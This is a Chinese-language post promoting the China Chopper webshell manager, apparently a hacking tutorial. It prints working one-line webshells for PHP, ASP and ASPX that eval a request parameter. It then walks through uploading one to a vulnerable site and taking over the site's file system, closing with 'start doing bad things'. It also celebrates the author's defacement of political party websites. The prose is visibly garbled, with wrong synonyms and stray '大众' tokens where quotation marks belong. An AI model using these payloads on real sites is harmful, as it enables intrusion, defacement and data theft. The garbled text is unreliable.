提及菜刀,就不得不提起菜刀的作者,作者是一个退伍军人,成长在一个贫穷的屯子,听说初中也没读完,英语更是不咋地,但他却自学节制了C++/J2ME/PHP/JSP/ASP.NET等等十数种打算机措辞,当初在六七年前台湾闹独立的时候,他在国民党和民进党的网站上留下了\"大众只有一个中国\"大众的黑页,一举成名。
作者是一个朴实,低调的技能牛人,他这些年留下的作品很多,中国菜刀是他最新的一个作品,从他之前的作品WEBSHELL管理器的根本上修正而来,功能更加的强大。
中国菜刀是一款专业的网站管理软件,用场广泛,利用方便,小巧实用。只要支持动态脚本的网站,都可以用中国菜刀来进行管理!
程序大小:214K,在非简体中文环境下利用,自动切换到英文界面。UINCODE办法编译,支持多国措辞输入显示。
紧张功能有:文件管理,虚拟终端,数据库管理。
1. 文件管理:[特色]缓存下载目录,并支持离线查看缓存目录;
2.虚拟终端:[特色]人性化的设计,操作方便;(输入HELP查看更多用法)
3.数据库管理:[特色]图形界面,支持YSQL,MSSQL,ORACLE,INFOMIX,ACCESS
以入支持ADO办法连接的数据库。
只要往目标网站中加入一句话木马,然后你就可以在本地通过中国菜刀chopper.exe即可获取和掌握全体网站目录。
什么是一句话木马?
一句话木马便是一句大略的脚本措辞,常见脚本措辞的一句话木马如下:
php:<?php @eval($_post['pass']);?>
asp:<%eval request (\"大众pass\公众)%>
aspx:<%@ Page Language=\"大众Jscript\"大众%> <%eval(Request.Item[\"大众pass\公众],\"大众unsafe\"大众);%>
一句话木马的利用
以php一句话为例,我们可以直接将这些语句插入到网站的某个php文件上,或者直接创建一个新的文件,在文件里写入一句话木马,然后把文件上传到网站上即可。
假设有个智障网站有这样的漏洞:
我们把这个phpma.php上传上去后,打开中国菜刀,在空缺处鼠标右键,选择\"大众添加选项\"大众
编辑干系参数,包括一句话木马所在的URL以及密码,末了点击\"大众编辑\公众 。
在URL中选中目标网站,点击鼠标右键,选择\公众文件管理\"大众,就能看到网站的目录构造了 。
获取全体网站的目录,然后就可以开始做坏事了。
